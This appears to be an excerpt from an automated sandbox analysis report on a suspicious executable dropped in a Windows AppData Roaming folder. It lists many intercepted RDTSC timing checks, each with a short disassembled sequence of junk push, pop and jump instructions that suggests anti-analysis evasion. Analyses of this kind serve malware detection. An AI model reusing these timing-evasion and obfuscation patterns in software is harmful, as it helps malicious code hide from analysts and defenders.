Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D7A second address: CE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE1 second address: CE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE5 second address: CE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE9 second address: CE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CEA456 second address: CEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CEA5AF second address: CEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2548 second address: CF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2558 second address: CF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF285C second address: CF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0E94F51A51h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2878 second address: CF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF287E second address: CF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2884 second address: CF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF29CE second address: CF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2B5E second address: CF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E948C9FB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2CFF second address: CF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF1B7A second address: CF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F0E948C9FBAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF7748 second address: CF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF774C second address: CF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E948C9FBAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F0E948C9FB6h 0x00000014 jl 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF776A second address: CF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF776E second address: CF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F0E948C9FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CFC07C second address: CFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D0F031 second address: D0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEA8 second address: C3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEC4 second address: C3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEC8 second address: C3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FECE second address: C3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E948C9FC5h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D1AF72 second address: D1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D1AF76 second address: D1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CB9 second address: D21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CC8 second address: D21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CCE second address: D21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D0A second address: D21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D14 second address: D21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F0E94F51A46h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D38 second address: D21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EB6 second address: D21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EC1 second address: D21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EC5 second address: D21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EDC second address: D21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D222FA second address: D2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A58h 0x00000007 ja 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2231F second address: D22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22327 second address: D2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2232C second address: D22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E948C9FB6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22677 second address: D2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2267C second address: D22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22682 second address: D2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22818 second address: D2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0E948C9FC2h 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2284F second address: D22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F0E94F51A46h 0x0000000d jg 00007F0E94F51A46h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26DF3 second address: D26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007F0E948C9FB6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0E948C9FB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F34 second address: C44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F3A second address: C44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F48 second address: C44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F4C second address: C44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26962 second address: D26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E94F51A48h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26970 second address: D26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F0E948C9FB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26983 second address: D26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26989 second address: D2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2698E second address: D26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B10 second address: D26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0E948C9FC4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B2D second address: D26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B33 second address: D26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B37 second address: D26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E94F51A46h 0x00000008 jbe 00007F0E94F51A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0E94F51A46h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D31F09 second address: D31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D31F0D second address: D31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45E15 second address: D45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F0E948C9FB6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45E36 second address: D45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45CAC second address: D45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D61915 second address: D6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6191A second address: D61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC3h 0x00000009 jnl 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D61937 second address: D6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6193B second address: D61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D606E0 second address: D606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A28 second address: D60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A2E second address: D60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E94F51A4Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0E94F51A55h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A5B second address: D60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D3A second address: D60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D4A second address: D60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D66 second address: D60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611C6 second address: D611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611CC second address: D611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611D7 second address: D611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D63036 second address: D6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D688B1 second address: D688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F0E948C9FC7h 0x0000000e jmp 00007F0E948C9FC1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6896E second address: D68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F0E94F51A46h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68985 second address: D689F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and edx, dword ptr [ebp+122D1C73h] 0x00000012 push 00000004h 0x00000014 jne 00007F0E948C9FC6h 0x0000001a call 00007F0E948C9FB9h 0x0000001f jmp 00007F0E948C9FBEh 0x00000024 push eax 0x00000025 jmp 00007F0E948C9FC6h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007F0E948C9FB6h 0x00000037 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D689F7 second address: D68A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F0E94F51A46h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68A0F second address: D68A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CA3 second address: D68CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CC3 second address: D68CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CC7 second address: D68CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6C086 second address: D6C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0EFC second address: 4EA0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0F00 second address: 4EA0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4016C second address: 4E4017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
